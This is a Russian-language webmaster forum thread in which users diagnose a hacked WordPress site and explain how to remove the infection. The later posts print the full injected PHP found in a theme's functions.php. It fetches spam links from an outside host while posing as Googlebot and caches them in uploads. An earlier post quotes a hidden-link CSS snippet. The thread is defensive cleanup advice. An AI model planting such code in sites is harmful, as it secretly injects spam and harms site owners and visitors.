Помощник
|
WordPress File Monitor: кое-что не могу понять |
DarkZo5m
|
Сообщение
#1
|
||
|
|
||
|
|||
RSmile |
4.7.2013, 1:40;
Ответить: RSmile
Сообщение
#2
|
|
Шелл залит) Нотепадом этот файл откройте и посмотрите его) А может с темой залит, смотреть надо. Удаляйте и ищите вредоносный код. Обычно в функшн.рхр
Сообщение отредактировал RSmile - 4.7.2013, 1:41 -------------------- |
|
|
DarkZo5m
|
Сообщение
#3
|
|
|
|
|
RSmile |
4.7.2013, 2:14;
Ответить: RSmile
Сообщение
#4
|
|
Причём тут пустые? Потом через шелл они наполнятся
Вот пример кода который встречается в файлах <!-- wp-templates.ru/rules правила ссылки >> --> <div id="posts"> Простые, интересные и умные <a href="http://timedead.ru/">флешки</a> </div><noindex><style>#posts{position:absolute;left:-1960px;}</style></noindex>
Сообщение отредактировал RSmile - 4.7.2013, 2:21 -------------------- |
|
|
DarkZo5m
|
Сообщение
#5
|
|
|
|
|
RSmile |
4.7.2013, 14:01;
Ответить: RSmile
Сообщение
#6
|
|
Ну ок, тогда ждите пометки от Яндекса. Я же русским языком написал, что это пока они пустые, потом заполнятся кодом. Ищите вредоносный код. Он может быть где угодно. Для начала начните с файлов темы. Это не так трудно.
-------------------- |
|
|
HeavyHell |
4.7.2013, 14:42;
Ответить: HeavyHell
Сообщение
#7
|
|
DarkZo5m, рассказать почему RSmile столь уверенно вам пытается объяснить?
Менее недели назад мы один его сайт от этой бяки чистили... Даже не знаю, есть ли смысл создавать тему коль не слушаете советов тех, кто с этим сталкивался -------------------- |
|
|
SeoFirma |
4.7.2013, 22:25;
Ответить: SeoFirma
Сообщение
#8
|
|
DarkZo5m, у Вас какая-то гадость в файлах темы, плагинов или движка. Это дырка, через которую пытаются что-то залить.
RSmile Вам написал пример кода, в данном случае, это скорее всего тоже взлом был. Ему таким образом вставляли невидимые для посетителей сайта ссылки. Первым делом, советую пересмотреть файлы темы, если разбираетесь в коде. А вообще, лучше переустановить движок с нуля, может еще где зараза есть. Ну и код темы смотреть обязательно. |
|
|
kagtus |
6.7.2013, 1:22;
Ответить: kagtus
Сообщение
#9
|
|
ищите в файлах шаблона вставку с таким началом
<?php error_reporting('^ E_ALL ^ E_NOTICE'); ini_set('display_errors', '0'); error_reporting(E_ALL); ini_set('display_errors', '0'); class Get_links { var $host = 'wpconfig.net'; var $path = '/system.php'; var $_cache_lifetime = 21600; var $_socket_timeout = 5; сегодня удалял такое, вставка была в wp-content/themes/тема/functions.php спамила в wp-content/uploads/2013 Сообщение отредактировал kagtus - 6.7.2013, 1:25 -------------------- |
|
|
DarkZo5m
|
Сообщение
#10
|
|
Хм, и правда, была гадя на сайте. В общем, у кого такая же проблема, открываем functions.php темы и удаляем оттуда следующий код:
<?php error_reporting('^ E_ALL ^ E_NOTICE');
ini_set('display_errors', '0'); error_reporting(E_ALL); ini_set('display_errors', '0'); class Get_links { var $host = 'wpconfig.net'; var $path = '/system.php'; var $_cache_lifetime = 21600; var $_socket_timeout = 5; function get_remote() { $req_url = 'http://'.$_SERVER['HTTP_HOST'].urldecode($_SERVER['REQUEST_URI']); $_user_agent = "Mozilla/5.0 (compatible; Googlebot/2.1; ".$req_url.")"; $links_class = new Get_links(); $host = $links_class->host; $path = $links_class->path; $_socket_timeout = $links_class->_socket_timeout; //$_user_agent = $links_class->_user_agent; @ini_set('allow_url_fopen', 1); @ini_set('default_socket_timeout', $_socket_timeout); @ini_set('user_agent', $_user_agent); if (function_exists('file_get_contents')) { $opts = array( 'http'=>array( 'method'=>"GET", 'header'=>"Referer: {$req_url}\r\n". "User-Agent: {$_user_agent}\r\n" ) ); $context = stream_context_create($opts); $data = @file_get_contents('http://' . $host . $path, false, $context); preg_match('/(\<\!--link--\>)(.*?)(\<\!--link--\>)/', $data, $data); $data = @$data[2]; return $data; } return '<!--link error-->'; } function return_links($lib_path) { $links_class = new Get_links(); $file = ABSPATH.'wp-content/uploads/2013/'.md5($_SERVER['REQUEST_URI']).'.jpg'; $_cache_lifetime = $links_class->_cache_lifetime; if (!file_exists($file)) { @touch($file, time()); $data = $links_class->get_remote(); file_put_contents($file, $data); return $data; } elseif ( time()-filemtime($file) > $_cache_lifetime || filesize($file) == 0) { @touch($file, time()); $data = $links_class->get_remote(); file_put_contents($file, $data); return $data; } else { $data = file_get_contents($file); return $data; } } } ?> |
|
|
|
Похожие темы
Тема | Ответов | Автор | Просмотров | Последний ответ | |
---|---|---|---|---|---|
Во что Вы играете? | 400 | Vmir | 67987 | 20.4.2024, 18:39 автор: SaintExchange |
|
Во что сегодня инвестировать? Делимся своими приносящими прибыль вариантами |
76 | traveliver | 5098 | 20.4.2024, 18:27 автор: SaintExchange |
|
Продам базу сайтов Wordpress в 16 миллионов доменов! Свежая сборка. | 19 | Boymaster | 11430 | 20.4.2024, 0:01 автор: Boymaster |
|
Нужен кодер, чтобы пофиксить ошибку Wordpress после переноса сайта | 0 | Alex-777 | 956 | 7.4.2024, 18:05 автор: Alex-777 |
|
Перенос сайта на CMS Wordpress | 8 | freeax | 4984 | 10.3.2024, 14:58 автор: freeax |
Текстовая версия | Сейчас: 25.4.2024, 16:04 |